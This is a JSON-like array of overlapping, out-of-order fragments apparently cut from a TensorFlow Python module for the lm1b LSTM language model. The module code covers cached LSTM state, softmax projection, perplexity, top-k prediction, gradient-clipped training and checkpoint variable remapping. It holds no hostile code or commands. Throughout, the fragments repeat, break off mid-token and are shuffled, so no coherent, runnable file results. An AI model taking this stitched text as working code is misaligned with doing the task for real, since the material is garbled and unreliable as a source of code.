[ "* hparams.sequence_length, 1024), initializer=tf.zeros_initializer, trainable=False) out_0, state_0 = cell(input, tf.nn.rnn_cell.LSTMStateTuple(state_c, state_h)) ass_c =", "num_proj=hparams.word_embedding_size, num_unit_shards=NUM_SHARDS, num_proj_shards=NUM_SHARDS, forget_bias=1.0, use_peepholes=True) state_c = tf.get_variable(name=\"state_c\", shape=(hparams.batch_size * hparams.sequence_length, 8192), initializer=tf.zeros_initializer,", "hidden state # https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html cell = tf.contrib.rnn.LSTMCell(num_units=NUM_SHARDS * hparams.word_embedding_size, num_proj=hparams.word_embedding_size, num_unit_shards=NUM_SHARDS, num_proj_shards=NUM_SHARDS, forget_bias=1.0,", ":param hparams: :return: tensor shaped [?,vocab_size] \"\"\" softmax_w = create_sharded_weights((hparams.vocab_size / NUM_SHARDS, hparams.word_embedding_size),", "Helper to pull out the most likely words :param logits: :param id_to_word_lookup_table: :param", "= filter(lambda x: re.match(r_match, x.name), lstm_vars) for v in matching_variables: var_map[re.sub(r_match, r_replace, v.name)]", "the most likely words :param logits: :param id_to_word_lookup_table: :param k: :param hparams: :return:", "output and state \"\"\" # LSTM with cached / preserved hidden state #", "to trainer # todo: add GPU support to trainer # todo: reset lstm", "nodes \"\"\" with tf.variable_scope(CHAR_EMBEDDING_SCOPE): word_embeddings = char_embedding_nodes.attach_char_embedding_nodes(input_seqs, num_shards=NUM_SHARDS, hparams=hparams) word_embeddings = tf.reshape(word_embeddings, (-1,", "global_step = tf.Variable(0, name='global_step', trainable=False) train_op = optimizer.apply_gradients(zip(all_gradients, trainable_vars), global_step=global_step) return {\"train_op\": train_op,", "state_0[1]) with tf.control_dependencies([ass_c, ass_h]): out_0 = tf.identity(out_0) return out_0, state_0 def _attach_projection_nodes(input, hparams=None):", "\"\"\" Predict next word for 
each sequence / timestep in input_seqs :param input_seqs:", "inconsistencies import tensorflow as tf import re import os import lm1b.model.char_embedding_nodes as char_embedding_nodes", "the current graph :param sess: :param run_config: :return: \"\"\" def create_lm1b_restoration_var_map(char_embedding_vars, lstm_vars, softmax_vars):", "cached / preserved hidden state # https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html cell = tf.contrib.rnn.LSTMCell(num_units=NUM_SHARDS * hparams.word_embedding_size, num_proj=hparams.word_embedding_size,", ":return: \"\"\" target_list = tf.reshape(targets, [-1]) target_weights_list = tf.to_float(tf.reshape(target_weights, [-1])) # hrmm word_count", ":param hparams: :return: \"\"\" target_list = tf.reshape(targets, [-1]) target_weights_list = tf.to_float(tf.reshape(target_weights, [-1])) #", "\"\"\" top_k = tf.nn.top_k(logits, k) top_word_ids = top_k.indices word_predictions = tf.reshape(id_to_word_lookup_table.lookup(tf.to_int64(tf.reshape(top_word_ids, [-1]))), [-1,", "= tf.add(tf.reduce_sum(target_weights_list), 0.0000999999974738) cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=target_list) cross_entropy = tf.multiply(cross_entropy, tf.to_float(target_weights)) return {\"log_perplexity\":", "var_map_regexes.items(): matching_variables = filter(lambda x: re.match(r_match, x.name), lstm_vars) for v in matching_variables: var_map[re.sub(r_match,", "x.op.name.find(\"lstm\"), all_gradients) non_lstm_gradients = set(all_gradients).difference(lstm_gradients) lstm_gradients, global_norm = tf.clip_by_global_norm(lstm_gradients, hparams.lstm_clip_grad_norm) all_gradients = non_lstm_gradients.union(lstm_gradients)", "\"\\d)/lstm_cell/bias.*\": r\"\\1/B\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/w_([fio])_diag.*\": lambda match: match.group(1) + \"/W_\" +", "next word for each sequence / timestep in input_seqs :param input_seqs: tensor of", "var_map = {} # Map char 
embedding vars var_map = merge(var_map, dict(map(lambda x:", "data_format=\"NHWC\") softmax = tf.nn.softmax(logits) return logits, softmax def _attach_log_perplexity_nodes(logits, targets, target_weights, hparams=None): \"\"\"", "state for inference # todo: cleanup batch_sizing inconsistencies import tensorflow as tf import", "hparams.word_embedding_size), num_shards=NUM_SHARDS, concat_dim=1) softmax_w = tf.reshape(softmax_w, shape=(-1, hparams.word_embedding_size)) softmax_b = tf.get_variable('b', shape=(hparams.vocab_size)) logits", "= \"softmax\" def attach_inference_nodes(input_seqs, hparams=None): \"\"\" Predict next word for each sequence /", "shape=(hparams.batch_size * hparams.sequence_length, 1024), initializer=tf.zeros_initializer, trainable=False) out_0, state_0 = cell(input, tf.nn.rnn_cell.LSTMStateTuple(state_c, state_h)) ass_c", "tf.add(tf.reduce_sum(target_weights_list), 0.0000999999974738) cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=target_list) cross_entropy = tf.multiply(cross_entropy, tf.to_float(target_weights)) return {\"log_perplexity\": tf.reduce_sum(cross_entropy)", "\"softmax\": softmax, \"cell_state_all_layers\": cell_state_all_layers, \"cell_out_all_layers\": cell_out_all_layers } def attach_predicted_word_nodes(logits, id_to_word_lookup_table, k=5, hparams=None): \"\"\"", "optimizer.apply_gradients(zip(all_gradients, trainable_vars), global_step=global_step) return {\"train_op\": train_op, \"global_step\": global_step} def restore_original_lm1b(sess, run_config): \"\"\" Var", "trainable=False) state_h = tf.get_variable(name=\"state_h\", shape=(hparams.batch_size * hparams.sequence_length, 1024), initializer=tf.zeros_initializer, trainable=False) out_0, state_0 =", "[-1]))), [-1, k]) return {\"predicted_words\": word_predictions, \"top_k\": top_k} def attach_training_nodes(loss, hparams=None): \"\"\" Attach", "x), softmax_vars))) return var_map var_map = create_lm1b_restoration_var_map( 
char_embedding_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=CHAR_EMBEDDING_SCOPE), lstm_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=LSTM_SCOPE_PREFIX), softmax_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=SOFTMAX_SCOPE)", "\"_diag\", } for r_match, r_replace in var_map_regexes.items(): matching_variables = filter(lambda x: re.match(r_match, x.name),", "embedding vars var_map = merge(var_map, dict(map(lambda x: (x.op.name, x), char_embedding_vars))) # Map lstm", "_attach_log_perplexity_nodes(logits, targets, target_weights, hparams=None): \"\"\" :param logits: :param targets: :param target_weights: :param hparams:", "hparams=None): \"\"\" :param logits: :param targets: :param target_weights: :param hparams: :return: \"\"\" target_list", "+ \"/W_\" + match.group( 2).upper() + \"_diag\", } for r_match, r_replace in var_map_regexes.items():", "LSTM with cached / preserved hidden state # https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html cell = tf.contrib.rnn.LSTMCell(num_units=NUM_SHARDS *", "tf.nn.top_k(logits, k) top_word_ids = top_k.indices word_predictions = tf.reshape(id_to_word_lookup_table.lookup(tf.to_int64(tf.reshape(top_word_ids, [-1]))), [-1, k]) return {\"predicted_words\":", "for r_match, r_replace in var_map_regexes.items(): matching_variables = filter(lambda x: re.match(r_match, x.name), lstm_vars) for", "# todo: add dropout to trainer # todo: add GPU support to trainer", "tf.global_variables() all_gradients = tf.gradients(loss, trainable_vars) lstm_gradients = filter(lambda x: -1 < x.op.name.find(\"lstm\"), all_gradients)", "= {r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/projection/kernel/part_(\\d).*\": r\"\\1/W_P_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/kernel/part_(\\d).*\": r\"\\1/W_\\2\",", ":param k: :param hparams: :return: \"\"\" top_k = tf.nn.top_k(logits, k) top_word_ids = top_k.indices", "nodes for training. Work in progress... 
:param loss: :param hparams: :return: \"\"\" trainable_vars", "tf.multiply(cross_entropy, tf.to_float(target_weights)) return {\"log_perplexity\": tf.reduce_sum(cross_entropy) / word_count, \"cross_entropy\": cross_entropy} CHAR_EMBEDDING_SCOPE = \"char_embedding\" LSTM_SCOPE_PREFIX", "SOFTMAX_SCOPE = \"softmax\" def attach_inference_nodes(input_seqs, hparams=None): \"\"\" Predict next word for each sequence", "train_op, \"global_step\": global_step} def restore_original_lm1b(sess, run_config): \"\"\" Var mapping shenanigans to restore the", "merge(var_map, dict(map(lambda x: (x.op.name, x), char_embedding_vars))) # Map lstm embedding vars var_map_regexes =", "https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html cell = tf.contrib.rnn.LSTMCell(num_units=NUM_SHARDS * hparams.word_embedding_size, num_proj=hparams.word_embedding_size, num_unit_shards=NUM_SHARDS, num_proj_shards=NUM_SHARDS, forget_bias=1.0, use_peepholes=True) state_c =", "todo: add dropout to trainer # todo: add GPU support to trainer #", "https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html see: https://stackoverflow.com/questions/37969065/tensorflow-best-way-to-save-state-in-rnns :param input: tensor of word embeddings :param hparams: :return: lstm", "range(0, 2): with tf.variable_scope(LSTM_SCOPE_PREFIX + str(layer_num)): cell_out, cell_state = _attach_cached_lstm_nodes(cell_out, hparams=hparams) cell_state_all_layers.append(cell_state) cell_out_all_layers.append(cell_out)", "tf.get_variable(name=\"state_c\", shape=(hparams.batch_size * hparams.sequence_length, 8192), initializer=tf.zeros_initializer, trainable=False) state_h = tf.get_variable(name=\"state_h\", shape=(hparams.batch_size * hparams.sequence_length,", "lstm_gradients = filter(lambda x: -1 < x.op.name.find(\"lstm\"), all_gradients) non_lstm_gradients = set(all_gradients).difference(lstm_gradients) lstm_gradients, global_norm", "concat_dim=1) softmax_w = tf.reshape(softmax_w, shape=(-1, 
hparams.word_embedding_size)) softmax_b = tf.get_variable('b', shape=(hparams.vocab_size)) logits = tf.nn.bias_add(tf.matmul(input,", "cell_state_all_layers = [] cell_out_all_layers = [] for layer_num in range(0, 2): with tf.variable_scope(LSTM_SCOPE_PREFIX", "batch_sizing inconsistencies import tensorflow as tf import re import os import lm1b.model.char_embedding_nodes as", "0.0000999999974738) cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=target_list) cross_entropy = tf.multiply(cross_entropy, tf.to_float(target_weights)) return {\"log_perplexity\": tf.reduce_sum(cross_entropy) /", "hparams.word_embedding_size)) with tf.variable_scope(SOFTMAX_SCOPE): logits, softmax = _attach_projection_nodes(lstm_outputs, hparams=hparams) return { \"word_embeddings\": word_embeddings, \"lstm_outputs\":", "train_op = optimizer.apply_gradients(zip(all_gradients, trainable_vars), global_step=global_step) return {\"train_op\": train_op, \"global_step\": global_step} def restore_original_lm1b(sess, run_config):", "cell_out_all_layers.append(cell_out) lstm_outputs = tf.reshape(cell_out, shape=(-1, hparams.word_embedding_size)) with tf.variable_scope(SOFTMAX_SCOPE): logits, softmax = _attach_projection_nodes(lstm_outputs, hparams=hparams)", "state_h)) ass_c = tf.assign(state_c, state_0[0]) ass_h = tf.assign(state_h, state_0[1]) with tf.control_dependencies([ass_c, ass_h]): out_0", "= tf.get_variable(name=\"state_c\", shape=(hparams.batch_size * hparams.sequence_length, 8192), initializer=tf.zeros_initializer, trainable=False) state_h = tf.get_variable(name=\"state_h\", shape=(hparams.batch_size *", "create_sharded_weights NUM_SHARDS = 8 def _attach_cached_lstm_nodes(input, hparams=None): \"\"\" LSTM with cached / preserved", "= tf.train.AdagradOptimizer(hparams.learning_rate) global_step = tf.Variable(0, name='global_step', trainable=False) train_op = optimizer.apply_gradients(zip(all_gradients, trainable_vars), global_step=global_step) return", 
"inference # todo: cleanup batch_sizing inconsistencies import tensorflow as tf import re import", "import tensorflow as tf import re import os import lm1b.model.char_embedding_nodes as char_embedding_nodes from", "softmax_vars))) return var_map var_map = create_lm1b_restoration_var_map( char_embedding_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=CHAR_EMBEDDING_SCOPE), lstm_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=LSTM_SCOPE_PREFIX), softmax_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=SOFTMAX_SCOPE) )", "lstm output and state \"\"\" # LSTM with cached / preserved hidden state", "input_seqs :param input_seqs: tensor of character encoded words :param hparams: :return: dict of", "in matching_variables: var_map[re.sub(r_match, r_replace, v.name)] = v # Map softmax embedding vars var_map", "{\"log_perplexity\": tf.reduce_sum(cross_entropy) / word_count, \"cross_entropy\": cross_entropy} CHAR_EMBEDDING_SCOPE = \"char_embedding\" LSTM_SCOPE_PREFIX = \"lstm/lstm_\" SOFTMAX_SCOPE", "tf.reshape(word_embeddings, (-1, hparams.word_embedding_size)) cell_out = word_embeddings cell_state_all_layers = [] cell_out_all_layers = [] for", "* hparams.word_embedding_size, num_proj=hparams.word_embedding_size, num_unit_shards=NUM_SHARDS, num_proj_shards=NUM_SHARDS, forget_bias=1.0, use_peepholes=True) state_c = tf.get_variable(name=\"state_c\", shape=(hparams.batch_size * hparams.sequence_length,", "inference nodes \"\"\" with tf.variable_scope(CHAR_EMBEDDING_SCOPE): word_embeddings = char_embedding_nodes.attach_char_embedding_nodes(input_seqs, num_shards=NUM_SHARDS, hparams=hparams) word_embeddings = tf.reshape(word_embeddings,", "targets, target_weights, hparams=None): \"\"\" :param logits: :param targets: :param target_weights: :param hparams: :return:", "= merge(var_map, dict(map(lambda x: (x.op.name, x), softmax_vars))) return var_map var_map = create_lm1b_restoration_var_map( 
char_embedding_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES,", "trainable_vars = tf.trainable_variables() tf.get_collection(tf.GraphKeys.MODEL_VARIABLES, scope=\"\") tf.global_variables() all_gradients = tf.gradients(loss, trainable_vars) lstm_gradients = filter(lambda", "{\"train_op\": train_op, \"global_step\": global_step} def restore_original_lm1b(sess, run_config): \"\"\" Var mapping shenanigans to restore", "char_embedding_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=CHAR_EMBEDDING_SCOPE), lstm_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=LSTM_SCOPE_PREFIX), softmax_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=SOFTMAX_SCOPE) ) saver = tf.train.Saver(var_list=var_map) saver.restore(sess, os.path.join(run_config['model_dir_path_original'], \"ckpt-*\"))", "tf.nn.rnn_cell.LSTMStateTuple(state_c, state_h)) ass_c = tf.assign(state_c, state_0[0]) ass_h = tf.assign(state_h, state_0[1]) with tf.control_dependencies([ass_c, ass_h]):", "\"\\d)/lstm_cell/projection/kernel/part_(\\d).*\": r\"\\1/W_P_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/kernel/part_(\\d).*\": r\"\\1/W_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/bias.*\":", "= tf.nn.top_k(logits, k) top_word_ids = top_k.indices word_predictions = tf.reshape(id_to_word_lookup_table.lookup(tf.to_int64(tf.reshape(top_word_ids, [-1]))), [-1, k]) return", "k=5, hparams=None): \"\"\" Helper to pull out the most likely words :param logits:", "+ LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/w_([fio])_diag.*\": lambda match: match.group(1) + \"/W_\" + match.group( 2).upper() +", "each sequence / timestep in input_seqs :param input_seqs: tensor of character encoded words", "lstm embedding vars var_map_regexes = {r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/projection/kernel/part_(\\d).*\": r\"\\1/W_P_\\2\", r\"^(\" +", "as char_embedding_nodes from lm1b.utils.util import merge from lm1b.utils.model import sharded_linear, create_sharded_weights NUM_SHARDS =", 
"tf.variable_scope(LSTM_SCOPE_PREFIX + str(layer_num)): cell_out, cell_state = _attach_cached_lstm_nodes(cell_out, hparams=hparams) cell_state_all_layers.append(cell_state) cell_out_all_layers.append(cell_out) lstm_outputs = tf.reshape(cell_out,", "sequence / timestep in input_seqs :param input_seqs: tensor of character encoded words :param", "todo: add GPU support to trainer # todo: reset lstm hidden state for", "in progress... :param loss: :param hparams: :return: \"\"\" trainable_vars = tf.trainable_variables() tf.get_collection(tf.GraphKeys.MODEL_VARIABLES, scope=\"\")", "add GPU support to trainer # todo: reset lstm hidden state for inference", "tf.reshape(cell_out, shape=(-1, hparams.word_embedding_size)) with tf.variable_scope(SOFTMAX_SCOPE): logits, softmax = _attach_projection_nodes(lstm_outputs, hparams=hparams) return { \"word_embeddings\":", ":param sess: :param run_config: :return: \"\"\" def create_lm1b_restoration_var_map(char_embedding_vars, lstm_vars, softmax_vars): var_map = {}", "shape=(-1, hparams.word_embedding_size)) softmax_b = tf.get_variable('b', shape=(hparams.vocab_size)) logits = tf.nn.bias_add(tf.matmul(input, softmax_w, transpose_b=True), softmax_b, data_format=\"NHWC\")", "top_word_ids = top_k.indices word_predictions = tf.reshape(id_to_word_lookup_table.lookup(tf.to_int64(tf.reshape(top_word_ids, [-1]))), [-1, k]) return {\"predicted_words\": word_predictions, \"top_k\":", "\"global_step\": global_step} def restore_original_lm1b(sess, run_config): \"\"\" Var mapping shenanigans to restore the pre-trained", "char_embedding_nodes from lm1b.utils.util import merge from lm1b.utils.model import sharded_linear, create_sharded_weights NUM_SHARDS = 8", "8 def _attach_cached_lstm_nodes(input, hparams=None): \"\"\" LSTM with cached / preserved hidden state see:", "lambda match: match.group(1) + \"/W_\" + match.group( 2).upper() + \"_diag\", } for r_match,", "to pull out the most likely words :param logits: :param id_to_word_lookup_table: 
:param k:", "lstm hidden state for inference # todo: cleanup batch_sizing inconsistencies import tensorflow as", "var_map_regexes = {r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/projection/kernel/part_(\\d).*\": r\"\\1/W_P_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/kernel/part_(\\d).*\":", "restore the pre-trained model to the current graph :param sess: :param run_config: :return:", "+ \"\\d)/lstm_cell/bias.*\": r\"\\1/B\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/w_([fio])_diag.*\": lambda match: match.group(1) + \"/W_\"", "[-1, k]) return {\"predicted_words\": word_predictions, \"top_k\": top_k} def attach_training_nodes(loss, hparams=None): \"\"\" Attach nodes", "tf.trainable_variables() tf.get_collection(tf.GraphKeys.MODEL_VARIABLES, scope=\"\") tf.global_variables() all_gradients = tf.gradients(loss, trainable_vars) lstm_gradients = filter(lambda x: -1", "\"\"\" Var mapping shenanigans to restore the pre-trained model to the current graph", "[-1]) target_weights_list = tf.to_float(tf.reshape(target_weights, [-1])) # hrmm word_count = tf.add(tf.reduce_sum(target_weights_list), 0.0000999999974738) cross_entropy =", "Map char embedding vars var_map = merge(var_map, dict(map(lambda x: (x.op.name, x), char_embedding_vars))) #", "x), char_embedding_vars))) # Map lstm embedding vars var_map_regexes = {r\"^(\" + LSTM_SCOPE_PREFIX +", "= tf.reshape(id_to_word_lookup_table.lookup(tf.to_int64(tf.reshape(top_word_ids, [-1]))), [-1, k]) return {\"predicted_words\": word_predictions, \"top_k\": top_k} def attach_training_nodes(loss, hparams=None):", "input: tensor of word embeddings :param hparams: :return: lstm output and state \"\"\"", "predictions :param input: lstm outputs :param hparams: :return: tensor shaped [?,vocab_size] \"\"\" softmax_w", "from lm1b.utils.model import sharded_linear, create_sharded_weights NUM_SHARDS = 8 def _attach_cached_lstm_nodes(input, hparams=None): \"\"\" LSTM", "with cached / preserved hidden state see: 
https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html see: https://stackoverflow.com/questions/37969065/tensorflow-best-way-to-save-state-in-rnns :param input: tensor", "tf.reshape(targets, [-1]) target_weights_list = tf.to_float(tf.reshape(target_weights, [-1])) # hrmm word_count = tf.add(tf.reduce_sum(target_weights_list), 0.0000999999974738) cross_entropy", "timestep in input_seqs :param input_seqs: tensor of character encoded words :param hparams: :return:", "add dropout to trainer # todo: add GPU support to trainer # todo:", "word embeddings :param hparams: :return: lstm output and state \"\"\" # LSTM with", "embeddings :param hparams: :return: lstm output and state \"\"\" # LSTM with cached", "targets: :param target_weights: :param hparams: :return: \"\"\" target_list = tf.reshape(targets, [-1]) target_weights_list =", "= tf.reshape(softmax_w, shape=(-1, hparams.word_embedding_size)) softmax_b = tf.get_variable('b', shape=(hparams.vocab_size)) logits = tf.nn.bias_add(tf.matmul(input, softmax_w, transpose_b=True),", "encoded words :param hparams: :return: dict of inference nodes \"\"\" with tf.variable_scope(CHAR_EMBEDDING_SCOPE): word_embeddings", "input_seqs: tensor of character encoded words :param hparams: :return: dict of inference nodes", "hparams: :return: tensor shaped [?,vocab_size] \"\"\" softmax_w = create_sharded_weights((hparams.vocab_size / NUM_SHARDS, hparams.word_embedding_size), num_shards=NUM_SHARDS,", "LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/kernel/part_(\\d).*\": r\"\\1/W_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/bias.*\": r\"\\1/B\", r\"^(\" + LSTM_SCOPE_PREFIX", "= tf.multiply(cross_entropy, tf.to_float(target_weights)) return {\"log_perplexity\": tf.reduce_sum(cross_entropy) / word_count, \"cross_entropy\": cross_entropy} CHAR_EMBEDDING_SCOPE = \"char_embedding\"", "= create_lm1b_restoration_var_map( char_embedding_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=CHAR_EMBEDDING_SCOPE), 
lstm_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=LSTM_SCOPE_PREFIX), softmax_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=SOFTMAX_SCOPE) ) saver = tf.train.Saver(var_list=var_map) saver.restore(sess,", "[-1])) # hrmm word_count = tf.add(tf.reduce_sum(target_weights_list), 0.0000999999974738) cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=target_list) cross_entropy =", ":return: tensor shaped [?,vocab_size] \"\"\" softmax_w = create_sharded_weights((hparams.vocab_size / NUM_SHARDS, hparams.word_embedding_size), num_shards=NUM_SHARDS, concat_dim=1)", "initializer=tf.zeros_initializer, trainable=False) out_0, state_0 = cell(input, tf.nn.rnn_cell.LSTMStateTuple(state_c, state_h)) ass_c = tf.assign(state_c, state_0[0]) ass_h", "\"cross_entropy\": cross_entropy} CHAR_EMBEDDING_SCOPE = \"char_embedding\" LSTM_SCOPE_PREFIX = \"lstm/lstm_\" SOFTMAX_SCOPE = \"softmax\" def attach_inference_nodes(input_seqs,", "for each sequence / timestep in input_seqs :param input_seqs: tensor of character encoded", "r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/bias.*\": r\"\\1/B\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/w_([fio])_diag.*\": lambda match:", "def _attach_log_perplexity_nodes(logits, targets, target_weights, hparams=None): \"\"\" :param logits: :param targets: :param target_weights: :param", "= tf.identity(out_0) return out_0, state_0 def _attach_projection_nodes(input, hparams=None): \"\"\" Project LSTM outputs to", "tensor shaped [?,vocab_size] \"\"\" softmax_w = create_sharded_weights((hparams.vocab_size / NUM_SHARDS, hparams.word_embedding_size), num_shards=NUM_SHARDS, concat_dim=1) softmax_w", "logits: :param id_to_word_lookup_table: :param k: :param hparams: :return: \"\"\" top_k = tf.nn.top_k(logits, k)", "non_lstm_gradients = set(all_gradients).difference(lstm_gradients) lstm_gradients, global_norm = tf.clip_by_global_norm(lstm_gradients, hparams.lstm_clip_grad_norm) all_gradients = 
non_lstm_gradients.union(lstm_gradients) optimizer =", "forget_bias=1.0, use_peepholes=True) state_c = tf.get_variable(name=\"state_c\", shape=(hparams.batch_size * hparams.sequence_length, 8192), initializer=tf.zeros_initializer, trainable=False) state_h =", "return var_map var_map = create_lm1b_restoration_var_map( char_embedding_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=CHAR_EMBEDDING_SCOPE), lstm_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=LSTM_SCOPE_PREFIX), softmax_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=SOFTMAX_SCOPE) ) saver", "+ LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/kernel/part_(\\d).*\": r\"\\1/W_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/bias.*\": r\"\\1/B\", r\"^(\" +", "for v in matching_variables: var_map[re.sub(r_match, r_replace, v.name)] = v # Map softmax embedding", "lstm_vars) for v in matching_variables: var_map[re.sub(r_match, r_replace, v.name)] = v # Map softmax", "shape=(hparams.vocab_size)) logits = tf.nn.bias_add(tf.matmul(input, softmax_w, transpose_b=True), softmax_b, data_format=\"NHWC\") softmax = tf.nn.softmax(logits) return logits,", "\"lstm_outputs\": lstm_outputs, \"lstm_state\": cell_state, \"logits\": logits, \"softmax\": softmax, \"cell_state_all_layers\": cell_state_all_layers, \"cell_out_all_layers\": cell_out_all_layers }", "tf.nn.softmax(logits) return logits, softmax def _attach_log_perplexity_nodes(logits, targets, target_weights, hparams=None): \"\"\" :param logits: :param", "preserved hidden state # https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html cell = tf.contrib.rnn.LSTMCell(num_units=NUM_SHARDS * hparams.word_embedding_size, num_proj=hparams.word_embedding_size, num_unit_shards=NUM_SHARDS, num_proj_shards=NUM_SHARDS,", "Predict next word for each sequence / timestep in input_seqs :param input_seqs: tensor", "and state \"\"\" # LSTM with cached / preserved hidden state # 
https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html", "num_proj_shards=NUM_SHARDS, forget_bias=1.0, use_peepholes=True) state_c = tf.get_variable(name=\"state_c\", shape=(hparams.batch_size * hparams.sequence_length, 8192), initializer=tf.zeros_initializer, trainable=False) state_h", "cell_out_all_layers } def attach_predicted_word_nodes(logits, id_to_word_lookup_table, k=5, hparams=None): \"\"\" Helper to pull out the", "filter(lambda x: -1 < x.op.name.find(\"lstm\"), all_gradients) non_lstm_gradients = set(all_gradients).difference(lstm_gradients) lstm_gradients, global_norm = tf.clip_by_global_norm(lstm_gradients,", "hparams=None): \"\"\" Project LSTM outputs to sparse vectors / word predictions :param input:", "lstm outputs :param hparams: :return: tensor shaped [?,vocab_size] \"\"\" softmax_w = create_sharded_weights((hparams.vocab_size /", "hparams: :return: dict of inference nodes \"\"\" with tf.variable_scope(CHAR_EMBEDDING_SCOPE): word_embeddings = char_embedding_nodes.attach_char_embedding_nodes(input_seqs, num_shards=NUM_SHARDS,", "dropout to trainer # todo: add GPU support to trainer # todo: reset", "r_replace in var_map_regexes.items(): matching_variables = filter(lambda x: re.match(r_match, x.name), lstm_vars) for v in", "\"top_k\": top_k} def attach_training_nodes(loss, hparams=None): \"\"\" Attach nodes for training. 
Work in progress...", "[?,vocab_size] \"\"\" softmax_w = create_sharded_weights((hparams.vocab_size / NUM_SHARDS, hparams.word_embedding_size), num_shards=NUM_SHARDS, concat_dim=1) softmax_w = tf.reshape(softmax_w,", "lm1b.model.char_embedding_nodes as char_embedding_nodes from lm1b.utils.util import merge from lm1b.utils.model import sharded_linear, create_sharded_weights NUM_SHARDS", "dict(map(lambda x: (x.op.name, x), softmax_vars))) return var_map var_map = create_lm1b_restoration_var_map( char_embedding_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=CHAR_EMBEDDING_SCOPE), lstm_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES,", ":param run_config: :return: \"\"\" def create_lm1b_restoration_var_map(char_embedding_vars, lstm_vars, softmax_vars): var_map = {} # Map", "state_0 def _attach_projection_nodes(input, hparams=None): \"\"\" Project LSTM outputs to sparse vectors / word", "embedding vars var_map_regexes = {r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/projection/kernel/part_(\\d).*\": r\"\\1/W_P_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX", "var_map = merge(var_map, dict(map(lambda x: (x.op.name, x), softmax_vars))) return var_map var_map = create_lm1b_restoration_var_map(", "match: match.group(1) + \"/W_\" + match.group( 2).upper() + \"_diag\", } for r_match, r_replace", "set(all_gradients).difference(lstm_gradients) lstm_gradients, global_norm = tf.clip_by_global_norm(lstm_gradients, hparams.lstm_clip_grad_norm) all_gradients = non_lstm_gradients.union(lstm_gradients) optimizer = tf.train.AdagradOptimizer(hparams.learning_rate) global_step", "word_embeddings = tf.reshape(word_embeddings, (-1, hparams.word_embedding_size)) cell_out = word_embeddings cell_state_all_layers = [] cell_out_all_layers =", "create_lm1b_restoration_var_map( char_embedding_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=CHAR_EMBEDDING_SCOPE), lstm_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=LSTM_SCOPE_PREFIX), 
softmax_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=SOFTMAX_SCOPE) ) saver = tf.train.Saver(var_list=var_map) saver.restore(sess, os.path.join(run_config['model_dir_path_original'],", "\"\\d)/lstm_cell/kernel/part_(\\d).*\": r\"\\1/W_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/bias.*\": r\"\\1/B\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/w_([fio])_diag.*\":", "_attach_cached_lstm_nodes(input, hparams=None): \"\"\" LSTM with cached / preserved hidden state see: https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html see:", "trainer # todo: reset lstm hidden state for inference # todo: cleanup batch_sizing", "# todo: cleanup batch_sizing inconsistencies import tensorflow as tf import re import os", "sess: :param run_config: :return: \"\"\" def create_lm1b_restoration_var_map(char_embedding_vars, lstm_vars, softmax_vars): var_map = {} #", "transpose_b=True), softmax_b, data_format=\"NHWC\") softmax = tf.nn.softmax(logits) return logits, softmax def 